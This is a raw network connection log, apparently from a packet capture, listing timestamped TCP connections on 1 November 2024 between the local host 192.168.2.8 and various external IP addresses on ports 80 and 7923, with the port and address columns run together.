                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.683168888 CET805002918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.683182955 CET805002918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.729383945 CET805002472.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.729702950 CET5002480192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.729780912 CET5002480192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.734561920 CET805002472.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.753814936 CET5003180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.758791924 CET805003144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.758863926 CET5003180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.758977890 CET5003180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.758994102 CET5003180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.763797045 CET805003144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.763834953 CET805003144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.419172049 CET805003144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.420972109 CET5003180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.426496029 CET805003144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.426549911 CET5003180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.446865082 CET5003680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.451709986 CET805003618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.455408096 CET5003680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.456665039 CET5003680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.456681013 CET5003680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.461426020 CET805003618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.461505890 CET805003618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.105318069 CET805002918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.109834909 CET5002980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.115031004 CET805002918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.117209911 CET5002980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.768152952 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.773041964 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.815277100 CET5004380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.820210934 CET805004334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.820446968 CET5004380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.820584059 CET5004380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.820584059 CET5004380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.825464010 CET805004334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.825476885 CET805004334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.887723923 CET805003618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.887952089 CET5003680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.893177032 CET805003618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.893421888 CET5003680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.907659054 CET5004480192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.912575006 CET805004418.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.148924112 CET80500683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.182939053 CET80500683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.185870886 CET5006880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.335690975 CET5006880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.340488911 CET80500683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.349370003 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.354238033 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.357892036 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.358045101 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.358074903 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.362822056 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.362838030 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.501105070 CET5007680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.506103039 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.506253958 CET5007680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.506408930 CET5007680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.506567955 CET5007680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.511265993 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.511370897 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684621096 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684743881 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684761047 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684772968 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684823036 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684817076 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684834003 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684871912 CET5007680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684880972 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684920073 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684967041 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.688726902 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.690984011 CET5007680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.694276094 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.695770025 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.727987051 CET5007880192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.734232903 CET805007834.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.735374928 CET5007880192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.735507011 CET5007880192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.735518932 CET5007880192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.740391016 CET805007834.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.740415096 CET805007834.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.783807993 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.788674116 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.920862913 CET5007980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.926028013 CET805007918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.926120996 CET5007980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.926631927 CET5007980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.926666975 CET5007980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.931425095 CET805007918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.931436062 CET805007918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.054397106 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.059508085 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.064351082 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.215574026 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.299290895 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.558945894 CET805007834.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.579129934 CET5007880192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.584269047 CET805007834.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.447447062 CET805011634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.447458982 CET805011634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.761959076 CET805010913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.764678955 CET5010980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.770104885 CET805010913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.770173073 CET5010980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.808535099 CET5012280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.813458920 CET805012218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.813534975 CET5012280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.813718081 CET5012280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.813781977 CET5012280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.818651915 CET805012218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.818664074 CET805012218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.299782038 CET805011634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.306453943 CET5011680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.311742067 CET805011634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.314076900 CET5011680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.498810053 CET805012218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.533029079 CET805012218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.535681963 CET5012280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.555654049 CET5012280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.560611010 CET805012218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.661111116 CET5012780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.666048050 CET805012744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.666124105 CET5012780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.668135881 CET5012780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.668153048 CET5012780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.672996998 CET805012744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.673007965 CET805012744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.025764942 CET5012880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.030705929 CET805012818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.030775070 CET5012880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.031259060 CET5012880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.031347036 CET5012880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.035996914 CET805012818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.036170006 CET805012818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.304544926 CET5009780192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.305311918 CET4989180192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.309695959 CET8050097208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.310271978 CET804989185.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.311397076 CET4989180192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.311424971 CET5009780192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.327838898 CET805012744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.335585117 CET5012780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.340775013 CET805012744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.340841055 CET5012780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.418859959 CET5013080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.423732996 CET805013018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.423799038 CET5013080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.423952103 CET5013080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.423960924 CET5013080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.428904057 CET805013018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.428915024 CET805013018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.692012072 CET805012818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.694314003 CET5012880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.700067043 CET805012818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.701637030 CET5012880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.083570004 CET805013018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.488452911 CET5015780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.493314981 CET805015718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.494431019 CET805015718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.622242928 CET5015880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.627149105 CET805015818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.627244949 CET5015880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.627470016 CET5015880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.627484083 CET5015880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.632288933 CET805015818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.632306099 CET805015818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.733062029 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.736444950 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.741576910 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.323848963 CET805015718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.324675083 CET5015780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.330264091 CET805015718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.330372095 CET5015780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.349423885 CET5016280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.354604006 CET805016218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.354701042 CET5016280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.355000019 CET5016280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.355000019 CET5016280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.359865904 CET805016218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.360040903 CET805016218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.462781906 CET805015818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.463428974 CET5015880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.468440056 CET805015818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.470597982 CET5015880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.627737045 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.632738113 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.641048908 CET5016380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.646037102 CET805016318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.646106958 CET5016380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.646754026 CET5016380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.647077084 CET5016380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.651532888 CET805016318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.652285099 CET805016318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.898814917 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.900401115 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.905678034 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.342012882 CET805016318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.342201948 CET5016380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.347546101 CET805016318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.347606897 CET5016380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.453998089 CET5016480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.459033012 CET805016444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.459129095 CET5016480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.459331989 CET5016480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.459362030 CET5016480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.464190960 CET805016444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.464202881 CET805016444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.784372091 CET805016218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.784528017 CET5016280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.790499926 CET805016218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.790611029 CET5016280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.800642967 CET5016580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.805639029 CET805016547.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.805722952 CET5016580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:27.085807085 CET5017280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:27.090636015 CET805017218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:27.090656042 CET805017218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.114092112 CET805017118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.114245892 CET5017180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.119822025 CET805017118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.119891882 CET5017180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.130403042 CET5017380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.135247946 CET805017318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.135319948 CET5017380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.135458946 CET5017380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.135477066 CET5017380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.140232086 CET805017318.208.156.248192.168.2.8
